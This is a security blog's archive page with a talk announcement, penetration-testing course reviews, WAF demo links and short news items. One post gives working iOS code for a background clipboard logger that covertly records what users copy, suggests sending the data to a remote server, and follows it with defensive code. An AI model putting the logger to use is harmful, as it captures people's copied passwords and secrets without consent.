BSidesLosAngeles Presentation

Filed under Uncategorized

I will be presenting at BSidesLosAngeles, where I will be going over the previous USCC Cyber Quest. It should be interesting. If you're from the area, make sure you get tickets soon!

http://www.securitybsides.com/w/page/36552449/BSidesLosAngeles

Simple iOS Pasteboard Logger

Filed under Research

I just went through the iGoat project released by OWASP. Some of the exercises were a bit fun. Although not very complex or in-depth, they pointed out security holes and aspects of iOS technology that I was not aware of.

One of the exercises noted that a shared, system-wide UIPasteboard (the general pasteboard) exists that every application can read and write unless it declares its own. I figured, hey, why not create a sort of logger that would snag the data whenever it was copied to the clipboard. Easy enough.

Here is the code. It's very simple and not really practical, considering it would never get into the App Store, but it's a fun proof of concept:

#import <UIKit/UIKit.h>
#import <unistd.h> // for sleep()

@implementation iSneakAppDelegate
... snip ...
- (void)applicationDidEnterBackground:(UIApplication *)application
{
    dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_DEFAULT, 0), ^{
        NSLog(@"starting...");
        UIApplication *app = [UIApplication sharedApplication];
        // UIBackgroundTaskIdentifier is an integer type, not an object pointer
        UIBackgroundTaskIdentifier bgTask;
        // Leave the expiration handler empty; endBackgroundTask: is deliberately never called
        bgTask = [app beginBackgroundTaskWithExpirationHandler:^{}];
        NSString *string = [[UIPasteboard generalPasteboard] string];
        while (YES) {
            NSString *newString = [[UIPasteboard generalPasteboard] string];
            if (newString != nil && ![newString isEqualToString:string]) {
                NSLog(@"Pasteboard: %@", newString); // log the value that was just read
                string = newString;
            }
            sleep(5); // pause the loop for a few seconds
        }
    });
}

This is pretty straightforward. It starts a background task, giving it an empty expiration handler so that the task is never ended and the loop keeps running. I then store the current value of the clipboard and begin a loop. The loop checks for any changes to the clipboard contents every 5 seconds. If the contents are different, it logs them.

Obviously, other things you would want to do include setting up a remote server that you could push the logged data out to. Also, UIPasteboard can hold other things besides strings, so it would be nice to add some robustness to handle other forms of data.
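As an added example that is not part of the original post, here is the defensive counterpart: an app that keeps its own sensitive values off the shared general pasteboard by using a private, non-persistent named pasteboard, and wipes the general pasteboard when it leaves the foreground, so a background poller like the one above has nothing to pick up. SecretViewController and the pasteboard name are hypothetical, and the code assumes ARC.

```objective-c
// Added example, not code from the original post. Hypothetical names; assumes ARC.
#import <UIKit/UIKit.h>

// Hypothetical private pasteboard name (reverse-DNS so it does not collide)
static NSString * const kPrivatePasteboardName = @"com.example.myapp.private";

@interface SecretViewController : UIViewController
- (void)copySecret:(NSString *)secret;
- (NSString *)pasteSecret;
- (void)clearGeneralPasteboard:(NSNotification *)note;
@end

@implementation SecretViewController

// An app-private pasteboard. It is not the general pasteboard, so other apps
// cannot read it unless they know its name (newer iOS versions additionally
// restrict named pasteboards to apps from the same developer team).
// persistent = NO: the contents do not survive the app being terminated.
- (UIPasteboard *)privatePasteboard
{
    UIPasteboard *pb = [UIPasteboard pasteboardWithName:kPrivatePasteboardName create:YES];
    pb.persistent = NO;
    return pb;
}

// Copy a sensitive value only within this app; never touch generalPasteboard
- (void)copySecret:(NSString *)secret
{
    [self privatePasteboard].string = secret;
}

- (NSString *)pasteSecret
{
    return [self privatePasteboard].string;
}

- (void)viewDidLoad
{
    [super viewDidLoad];
    // Wipe the shared clipboard whenever the app leaves the foreground, so a
    // value the user copied normally is not left behind for other apps to read.
    [[NSNotificationCenter defaultCenter] addObserver:self
                                             selector:@selector(clearGeneralPasteboard:)
                                                 name:UIApplicationWillResignActiveNotification
                                               object:nil];
}

- (void)clearGeneralPasteboard:(NSNotification *)note
{
    // Assigning an empty item list removes every representation on the pasteboard
    [UIPasteboard generalPasteboard].items = [NSArray array];
}

- (void)dealloc
{
    [[NSNotificationCenter defaultCenter] removeObserver:self];
}
@end
```

The trade-off is usability: the user cannot paste the secret into another app, which is exactly the point for values such as one-time codes or keys.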

Securing software with the Application and Front Controller Patterns

Filed under Research

I wrote an article for Infosec Institute. I went over how to develop secure software by utilizing a special application controller that funnels all user input through the appropriate validation. It essentially eliminates the likelihood of overlooking user input or neglecting the validation code in future updates, which is very helpful for scaling applications.

Check it out:

http://resources.infosecinstitute.com/securing-software-with-the-application-and-front-controller-patterns/


[Review] eLearnSecurity – Professional Penetration Testing course

Filed under Reviews

I finally completed the eLearnSecurity Professional course. Before I go into the review, let me outline for you how the course looks and the context from which I will review it.

The course consists of three sections: Web Application, Network, and System. Each section is taught by different instructors who have a background in the area. Although they follow a similar presentation style, I was surprised at how different the learning experience was in each section. Based on what I took from the class, as well as what I have read from their marketing and discussed with their owner, here are the things that the eLearnSecurity Professional course tries to provide for its students:

  1. Real world penetration testing skills (Fantastic)
  2. Penetration testing process (So so)
  3. Up-to-date information (Great)
  4. CEH level of depth (Superb)

I would say that the course measured up to about 90% of that, which is pretty dang good when you consider a lot of the hacking courses out there. Now, my experience with most of my certifications involved a curriculum book and a review book. From there I would take the test and hope I passed. So when I review this course I am assuming that the reader is in a similar situation and is looking at eLearnSecurity as an alternative.

Web Application

In my opinion this was the best section. I really got my start in pen testing at the web app level.

  • Pros: I felt like the instructor did a great job at presenting the information in a clear, easy-to-understand manner. The information took me deeper into the technology than traditional CEH-level training, which tends to keep you at a “script kiddie” level of complexity. Although the instructor took time to explain some underlying technology, he also did not overwhelm you with it. While most trainings take you as far as XSS and SQLi, eLearnSecurity then presses you into CSRF, HTTP header injection, RFI, and more. I was even more impressed when he explained exploit chaining. As with their Student course, they did a fantastic job at not overwhelming you with tools, but helped you focus on one or two key tools that are prominent in the field today, not some antiquated script from the '90s. The interactive slides made it easy to follow along and easy to understand the anatomy of the payloads. In addition to that, the instructor teaches the student how to completely case a web application and record findings in an organized way that a team of testers can use and that eventually helps create a test report.
  • Cons: I don't have any real qualms with the content. However, I do wish that a more exercise-based approach could have been taken. I need to be fair and state that there were quite a few exercises involving Burp Suite and Wireshark; however, the other tools were neglected. I can understand the difficulty of setting up a virtual lab environment and distributing it on an ISO. By no means did I feel like my learning experience was wasted without such a lab, but at the same time I can imagine a less-informed student struggling a bit more without a hands-on walkthrough available. That's my only gripe about the web app section. Other than that it was fantastic!

[EDIT] The eLearnSecurity guys provide a free two-week access pass to their Web Application Coliseum, which provides a mission-oriented lab to try out your web application hacking skills. [/EDIT]

Network

  • Pros: Network penetration testing is a hard thing to teach. It usually requires a fairly extensive lab environment with simulated networking equipment and systems in order to do justice to the possibilities out there. The instructor of this section did a very nice job presenting some of the basic principles of network hacking. He mostly covered the enumeration and exploitation of Windows and NetBIOS-related technologies. He also explained host discovery, port scanning and SNMP. I felt like the information was presented clearly and concisely enough to help less network-savvy individuals stay on target. The nature of network attacks also made it easy for the instructor to outline the basic hacking process from information gathering to establishing persistence.
  • Cons: I guess I was pretty spoiled after the other two sections, but I was expecting this section to give me an extra zing like the System and Web App sections did. Don't get me wrong, he covered pretty much everything that is talked about in the CEH. I guess I was just spoiled by the rest of the course ;) (that's a good thing, right?). I really wanted to see some more depth here. I understand the difficulty of going too deep too quickly when it comes to networks, but perhaps some more content could be added in a few other ways? For instance, going over the ICMP protocol in detail is actually a very helpful thing to know.

System

  • Pros: You can definitely tell that the instructors of this section know what they are talking about. Although my background in system hacking (buffer overflows, ASM, etc.) should be considered only fair, I feel like I can give a fairly good assessment of this section as being quite helpful. I have watched and read many “intro” guides to these complex topics, but I felt that the eLearnSecurity instruction was some of the easiest to understand. To top it off, this section has amazing hands-on examples and exercises that I had really been wanting in this course. I was even more blown away when the instructors took us into shellcode creation, malware techniques, and rootkit development. I was getting a little worried that some of the basics of system hacking were being ignored (like ADS), but sure enough they came up. This section was quite superb and is sure to be a section I will refer to often.
  • Cons: Due to the nature of the topic I'm not sure it would be fair to call it a con, but I guess it should be said. There were some points during the more advanced sections where I felt very lost. But like I said, how can I expect them to teach a student all of the subtleties of the Windows kernel and APIs? So with that being said, I wouldn't say it's a con, just more of a steep learning curve that would require outside reading to fully understand. Maybe they could provide some good resources?


Overall this course was very good. How does it compare to the CEH? Well, it covers pretty much everything the CEH intends to cover. Some little things were left out (like the aforementioned ICMP material), but I felt this course does a much better job at teaching you the skills used in penetration testing. One letdown was that the pen testing methodology was covered only weakly. One thing the CEH did do well was ensure your understanding of the stages of hacking. After that, the ECSA then helped with the more organizational aspects of conducting a penetration test. However, if you were to take both the Student and the Professional course, you would get a very thorough understanding of the pen test process, as well as techniques that would get you on your way to becoming a skilled tester. I would still like to see a lab VM shipped with the course that came loaded with tools and services to test the Web App and Network material on.

In conclusion, I very much enjoyed these courses. They were quite informative. They did have some grammatical issues and some of the slides were a bit mundane, but try reading the “ISC2 Official Guide to the CISSP CBK” and then you can talk to me about mundane reading. Although the courses were not perfect and the price could be hard for some, I would have to agree that eLearnSecurity better provides the skill set that you would hope to get from many other ethical hacking courses out there, specifically the CEH. Remember, these courses are not meant to be in-class trainings, so don't expect them to be. Also, a certification is included in the course (and in the cost, which is usually around $250 for any other cert), and although I have not taken it, I anticipate that its reality-based test won't let you down. So bravo to the guys at eLearnSecurity. Keep up the good work; I am eager to see how much better the course turns out to be in a few years.

ModSecurity Demo Projects: VirusTotal of WAF

Filed under Tools

For those looking for a place to test their web app payloads, check out the ModSecurity demo pages. They offer the WAF equivalent of VirusTotal.


Check it out here

EDIT:

PHPIDS has one as well - https://demo.phpids.org/

Linux Shells With Built In Tools

Filed under Fu (a.k.a Tips), Weaponizing /bin/sh

I love posts like these: 7 Linux shells using only built-in tools!

[Review] eLearnSecurity – Penetration Testing Student Course

Filed under Reviews

A while back I had posted a reader's opinion on the eLearnSecurity Online Penetration Testing Course. Those of you who have read it will remember that it was fairly negative. As a result, the owners of eLearnSecurity have offered me the opportunity to view the entire suite of their courses in return for a review of my own. This is the first of three reviews, this one focusing on the Student-level course.


I would first like to lay some “ground rules” that are important to understand when giving a fair review.

  1. Target Audience – To accurately assess the quality of training, we need to understand that there are different levels of audience that may view the actual content. For this reason, more experienced viewers will be less stimulated by the learning than someone with less experience. Therefore, we must approach the review from the standpoint of the target audience.
  2. Medium – We must also consider the medium (i.e., videos, in-class, online, etc.). This too has a major effect on the learning, and a course should only be compared against others in a similar medium.
  3. Claims – More than the others even, we must only expect to take away from the course what the trainers claim to provide. It would be quite unfair not to take this into account.


The Setting

eLearnSecurity provides their “Student” level course for those brand new to the field. Through emails it was not made completely clear to me how novice these students would be. However, from the content of the course it was fairly clear that they did not expect a whole lot of technical background from their target audience, but would provide the groundwork for them.

The purpose of the course is to prepare the student to take the “Professional” level course, which I have intentionally not gone over yet. From reading other reviews and advertisements I know that their main course is meant to be the “CEH Killer”. So when reviewing this “Student” course I will approach it from one who would be looking to lay a foundation for undertaking a CEH level course.


The Review

I will start off by saying that doing this review was actually quite difficult. Because my level of understanding is beyond that of the target audience, it was difficult to assess whether certain areas were covered in enough depth and clearly enough. However, I believe I have done a fairly good job of putting myself into a novice's shoes.

When you start the course you are presented with two choices, “Preliminary Skills” and “Penetration Testing”. I began from the very beginning, focusing on the Preliminary Skills. I think they did a fairly good job at presenting the base understanding necessary to comprehend penetration testing and its required skills. Because of the nature of hacking and pen testing, the skill set needed to really delve into the industry requires an immense amount of technical background in all different IT-related fields. This course provides a very basic outline of those skills. I don't know if I personally could say for certain that their Preliminary Skills portion is perfect in providing this background. However, I believe that it probably does an adequate job of preparing the student for the Penetration Testing portion of the course. I found it quite refreshing to find a training resource that did more than just instruct you to do personal research on prerequisite skills. I will say that students should take time to read and study the recommended reading found at the end of each section. The part I appreciated most about the Preliminary Skills portion was the fact that they explain why each skill (routing, protocols, etc.) is important, how it will help with penetration testing, and what hacking skill it supports. This definitely encouraged me to gain a better understanding of the topic and put the skill into context. Overall I think the preliminary skill index was well done and quite useful. But like I said, I would not recommend it (nor would they claim it) as the sole source of learning for a complete IT novice.

The Penetration Testing slide portion of the Student course was quite fantastic in my opinion. However, the lab portion was a letdown. The lab setup provided was not really used, nor are there specific tasks assigned or instructions provided on how to execute any sort of “assignments”. The setup was simply BackTrack and Metasploitable. What I would like to have seen was specific tasks and perhaps walkthroughs on how to do these specific attacks in the lab environment. However, I understand that this course is almost entirely theoretical in nature. Heck, the CEH is even less hands-on unless you take an in-class prep course. So I believe it is fairly reasonable to expect the eLearnSecurity courses to fall somewhere between self-study and in-class when it comes to hands-on training. I should also mention that the videos are presented in a way that permits a “follow along”, so there is some limited hands-on available.

The content of the Penetration Testing slides was great. They won't overwhelm a novice with a list of a million tools; they focus on those most commonly used today by pen testers. In addition, the videos provided were detailed, clear and thorough. Things were explained more clearly than I had learned them in the past, and certain things were taught which I had never seen covered at that level before. They cover a broad range of attacks and give a great base to build further penetration testing courses on.

Now, some people got upset about the course medium itself. Yes, the course is a large collection of slides and videos. However, I don't think that is unreasonable, nor does it make it ineffective. True, certain things could have been done better: not all of the slides had voice, some were plain and bland, etc. However, overall I think that the slides, and the interaction available in a good portion of them, allow you to learn better than from a self-study book.

In Conclusion

I think this course is a great beginner's course. I would recommend it as a sort of Security+ level of penetration testing. I will say that if you are looking for an experience like you would get in a classroom environment, then you may be let down. But that's not what this course claims to be. In my opinion, this is the perfect way to do a self-study course as opposed to the traditional books that are out there. Coming from a guy who has done all of his certifications via self-study and books, I can tell you that if I had had something more interactive like this, then my certifications would have been much more enjoyable to attain.

Stay tuned for reviews of the Professional level course as well as their Web Application Coliseum.

Hackers Use Social Engineering? Duh…

Filed under Reviews

United States Solidifies Cyber ROE

Filed under News

This story was posted on packetstorm this morning and is probably being underappreciated in terms of its groundbreaking impact. For some time now we have understood that “acts of cyber aggression” aimed towards a country would be considered an act of war. However, defining an appropriate course of reaction has been the topic of debate for some time. With the President's new policy we have finally settled that by stating: “When warranted, the United States will respond to hostile acts in cyberspace as we would to any other threat to our country.” You can read the entire story here, and the actual White House policy here.

I could be jumping the gun on this, but to me it seems that the President has authorized and committed the U.S. military to take cyber threats more seriously than before.

A Good Lesson By Barracuda Labs

Filed under Defense, Fu (a.k.a Tips)

Barracuda Labs puts out many popular security devices and other defensive solutions. They recently suffered a SQL injection attack on their site that compromised some of their email contacts. Here is their official posting and dissection of the attack.

The important lesson to be learned here is not necessarily how the attack was done or how it was detected. The important thing is identifying why the attack was able to happen at all. Many people would overlook a single fault such as an unsanitized input field or a misconfigured WAF. On its own, each of these issues may be dangerous for a smaller organization, but a larger organization may overlook the attack surface that these weaknesses create when they are aggregated.
